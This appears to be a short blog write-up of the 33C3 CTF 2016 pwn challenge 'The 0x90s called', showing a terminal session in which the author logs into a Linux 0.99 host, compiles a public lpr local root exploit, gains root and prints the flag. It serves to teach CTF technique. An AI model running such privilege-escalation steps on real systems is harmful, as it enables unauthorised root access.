Hacking Tube

33C3 CTF 2016 -- The 0x90s called

| Comments

Category: pwn
Points: 150

First we'll have to go to a web page to start our challenge session. The page will show us the port (same IP address with the web page) and the ID/password.

Once we connected to the remote host and login the machine, we'll found that we're inside a Slackware Linux:

$ nc 78.46.224.70 2323

Welcome to Linux 0.99pl12.

slack login: challenge
Password:challenge

Linux 0.99pl12. (Posix).
No mail.
slack:~$ uname -a
Linux slack 0.99.12 #6 Sun Aug 8 16:02:35 CDT 1993 i586

Later we'll found that there's a flag.txt inside the root directory:

slack:/$ ls -al /flag.txt
-r--------   1 root     root           36 Dec 27  1916 /flag.txt

Looks like we'll need a local root exploit to capture the flag.

By googling "slackware linux 0.99 local root exploit", we found a working PoC. Now all we need to do is copy the PoC to the remote host, then compile & execute the exploit so we can escalate to root.

Although it looks simple, it still took me a while to complete the challenge, since there's no tool that can help us download the PoC to the host -- no wget, no curl, not even nc!! And the vi editor is just terrible!! Finally I decided to use cat <<'EOF' >> test.c + copy & paste to write the exploit into test.c.

After we compile & execute the local root exploit, we're able to escalate to root and get the flag:

slack:~$ gcc -o test test.c
slack:~$ ./test
[ Slackware linux 1.01 /usr/bin/lpr local root exploit
# id
id
uid=405(challenge) gid=1(other) euid=0(root) egid=18(lp)
# cat /flag.txt
cat /flag.txt
33C3_Th3_0x90s_w3r3_pre3tty_4w3s0m3

flag: 33C3_Th3_0x90s_w3r3_pre3tty_4w3s0m3

Comments

comments powered by Disqus